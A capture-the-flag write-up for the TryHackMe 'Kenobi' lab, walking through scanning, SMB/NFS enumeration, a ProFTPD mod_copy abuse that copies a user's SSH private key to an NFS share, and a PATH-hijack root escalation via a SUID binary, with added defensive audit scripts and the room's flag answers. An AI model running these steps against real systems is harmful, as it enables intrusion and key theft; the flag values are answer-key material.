Kenobi THM

performed by: jb-williams

Deploy the vulnerable machine

Scan the machine with nmap, how many ports are open?

  • Deploy the Machine and scan it with nmap
nmap -v -p- -sV -sC -T4 -oA nmap/initial 10.10.223.56 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l

Note: you may get some false positives that show an unknown service; ignore them.

  • Answer: Number of ports open: 7
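The port count above is pulled out of nmap's normal output by grepping for "open". The following shell functions are an added example (not part of the original writeup) that do the same thing over the .nmap file written by -oA, while also dropping the unknown or guessed ("?") services the note warns about. The nmap output below is a constructed sample modelled on nmap's format, not a real scan of the room machine.

```sh
#!/bin/sh
# Added example: count open ports from nmap normal output (the .nmap file
# written by -oA / -oN), skipping services nmap reports as "unknown" or
# marks as a guess with a trailing "?".

# Constructed sample of nmap normal output (not a real scan result).
SAMPLE_NMAP='# Nmap 7.80 scan initiated
Nmap scan report for 10.10.223.56
PORT      STATE  SERVICE     VERSION
21/tcp    open   ftp         ProFTPD 1.3.5
22/tcp    open   ssh         OpenSSH 7.2p2
80/tcp    open   http        Apache httpd
111/tcp   open   rpcbind     2-4 (RPC #100000)
139/tcp   open   netbios-ssn Samba smbd
445/tcp   open   netbios-ssn Samba smbd
2049/tcp  open   nfs_acl     2-3 (RPC #100227)
8080/tcp  open   unknown
9999/tcp  open   abyss?
10000/tcp closed snet-sensor-mgmt'

# open_ports NMAP_OUTPUT: print the port number of every line whose state
# is "open" and whose service is neither "unknown" nor a guess.
open_ports() {
    printf '%s\n' "$1" | awk '
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            svc = $3
            if (svc == "unknown" || svc ~ /\?$/) next
            split($1, p, "/")
            print p[1]
        }'
}

# count_open_ports NMAP_OUTPUT: number of ports that pass the filter above.
count_open_ports() {
    open_ports "$1" | wc -l | tr -d ' '
}

# Usage against a real scan file: count_open_ports "$(cat nmap/initial.nmap)"
echo "open ports in sample: $(count_open_ports "$SAMPLE_NMAP")"
```

Against the constructed sample the filter keeps 21, 22, 80, 111, 139, 445 and 2049 and drops the unknown 8080 and the guessed 9999, which is the kind of false positive the note refers to.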

Enumerating Samba for shares

Using the nmap command above, how many shares have been found?

  • The room points out the SMB service found by the previous nmap scan and suggests enumerating its shares with nmap scripts.
  • SMB usually runs on ports 139 and 445.
  • You can enumerate SMB shares and users with these nmap scripts:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.223.56
  • Answer: 3

Once you’re connected, list the files on the share. What file can you see?

  • The scripts show an anonymous share.
  • Attempt to login to the share with blank password.
smbclient //10.10.223.56/anonymous
  • To list the files, run the ls command.
  • While logged in you can download that file running:
get log.txt
  • Or you can download recursively without an interactive login with:
smbget -R smb://10.10.223.56/anonymous
  • Answer: log.txt

What port is FTP running on?

  • According to log.txt, the FTP service is running on:
  • Answer: 21

What mount can we see?

  • Going back to our nmap scan for open ports, we can see RPC running on port 111 (in this case), and we can enumerate that service further with nmap:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.223.56
  • Answer: /var
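The /var export is what makes the later key theft possible: a directory tree that any host can mount is effectively readable by everyone on the network. As an added example (not from the writeup), the shell functions below audit an /etc/exports file for exports open to any client or exported with no_root_squash, which is the check an administrator of this box would want. The exports content is a constructed sample, not the room machine's real configuration.

```sh
#!/bin/sh
# Added example: audit NFS /etc/exports entries for two common weaknesses,
# exports reachable from any host ("*") and exports that disable root
# squashing (no_root_squash). Sample content is constructed.

SAMPLE_EXPORTS='# /etc/exports: constructed sample
/srv/share   192.168.1.0/24(ro,sync,root_squash)
/var         *(rw,sync,no_root_squash)
/home/data   10.0.0.5(rw,sync)
/tmp         *(ro,sync)'

# risky_exports EXPORTS_CONTENT: print "PATH CLIENT REASON" for each
# client entry that is open to any host or sets no_root_squash.
risky_exports() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || NF == 0 { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i
                opts = ""
                # split "client(opt,opt)" into client and option list
                if (match(client, /\(.*\)$/)) {
                    opts = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                reason = ""
                if (client == "*") reason = "any-host"
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    reason = (reason == "") ? "no_root_squash" : (reason ",no_root_squash")
                if (reason != "") print path, client, reason
            }
        }'
}

# count_risky_exports EXPORTS_CONTENT: number of flagged client entries.
count_risky_exports() {
    risky_exports "$1" | wc -l | tr -d ' '
}

# Usage on a real server: risky_exports "$(cat /etc/exports)"
risky_exports "$SAMPLE_EXPORTS"
```

On the sample this flags /var (any host, root not squashed) and /tmp (any host) and leaves the two host-restricted exports alone; restricting the client list and keeping root_squash are the corresponding fixes.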

Gain initial access with ProFtpd

What is the version?

  • With netcat you can connect quickly and read the banner to find the version of ProFTPD running:
nc 10.10.223.56 21
  • Answer: 1.3.5

How many exploits are there for the ProFTPD running?

  • You can easily check for basic, known vulnerabilities with searchsploit:
searchsploit proftpd 1.3.5
  • Answer: 4

What is Kenobi’s user flag (/home/kenobi/user.txt)?

  • We see from searchsploit that there is a mod_copy vulnerability in ProFTPD.
  • And from log.txt we know there is an SSH key created for the kenobi user.
  • So, let’s try to copy kenobi’s SSH key to the mountable directory:
nc 10.10.223.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.223.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
  • Earlier, with the scan on port 111, we saw that there is a mount point at /var, and we just copied the SSH key into that directory tree.
  • Let’s mount the /var directory on our machine:
mkdir /mnt/kenobiNFS
mount 10.10.223.56:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
  • Now we can browse /mnt/kenobiNFS, copy kenobi’s private key out of it, and use it to log in as that user:
cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.223.56
  • Answer: d0b0f3f53b6caa532a83915e19224899

Privilege Escalation with Path Variable Manipulation

What file looks particularly out of the ordinary?

  • They give you some info about SUID binaries and explain that they can be used to escalate privileges.
  • Using their command, try to find the file that looks out of the ordinary. (I have used my own machine as reference several times.)
find / -perm -u=s -type f 2>/dev/null
  • Answer: /usr/bin/menu

Run the binary, how many options appear?

  • Answer: 3

What is the root flag (/root/root.txt)?

  • Looking at the binary with ls -la /usr/bin/menu shows that it is owned by root and, being SUID, runs with root privileges.

  • Running strings /usr/bin/menu shows that the commands are not being run using absolute paths, so we may be able to exploit this.

  • We are going to create /tmp/curl containing /bin/bash (so executing it launches a shell), then modify $PATH so our file is found before the real curl.

echo /bin/bash > /tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
  • Then run /usr/bin/menu again and choose option 1, which uses curl; it will place you in a privileged bash shell.

  • Answer: 177b3cd8562289f37382721c28381f02
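The root of this escalation is a setuid binary that runs helpers by bare name, so the caller's PATH decides which "curl" executes. As an added example (not from the writeup), the shell functions below turn the strings check above into a repeatable audit: they flag any embedded command line whose first word is a known command without a leading slash. The command list and the strings output are constructed assumptions, not the contents of the real /usr/bin/menu.

```sh
#!/bin/sh
# Added example: flag command invocations embedded in a setuid binary that
# use a bare command name instead of an absolute path. Such calls resolve
# through the caller's PATH, which is what the /tmp/curl trick abuses.
# KNOWN_CMDS and SAMPLE_STRINGS are constructed assumptions.

# Commands a menu-style helper might shell out to (assumed list).
KNOWN_CMDS='curl uname ifconfig ls cat id'

# Constructed stand-in for `strings /usr/bin/menu` output.
SAMPLE_STRINGS='/lib64/ld-linux-x86-64.so.2
curl -I localhost
uname -r
/sbin/ifconfig
Enter your choice:
ls -la /tmp
Invalid choice or choice not implemented'

# relative_calls STRINGS_OUTPUT: print lines whose first word is a known
# command invoked without a leading slash.
relative_calls() {
    printf '%s\n' "$1" | awk -v cmds="$KNOWN_CMDS" '
        BEGIN { n = split(cmds, c, " "); for (i = 1; i <= n; i++) known[c[i]] = 1 }
        NF > 0 && $1 !~ /^\// && ($1 in known) { print }'
}

# count_relative_calls STRINGS_OUTPUT: number of flagged lines.
count_relative_calls() {
    relative_calls "$1" | wc -l | tr -d ' '
}

# audit_binary FILE: run strings(1) on a real file and apply the same check.
audit_binary() {
    relative_calls "$(strings "$1")"
}

# Usage on a real box: audit_binary /usr/bin/menu
relative_calls "$SAMPLE_STRINGS"
```

On the sample this reports the curl, uname and ls lines and ignores /sbin/ifconfig. The fix on the binary side is the same one the finding implies: invoke helpers by absolute path, or have the program reset PATH to a fixed system value before it execs anything.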

written and performed by jb-williams - github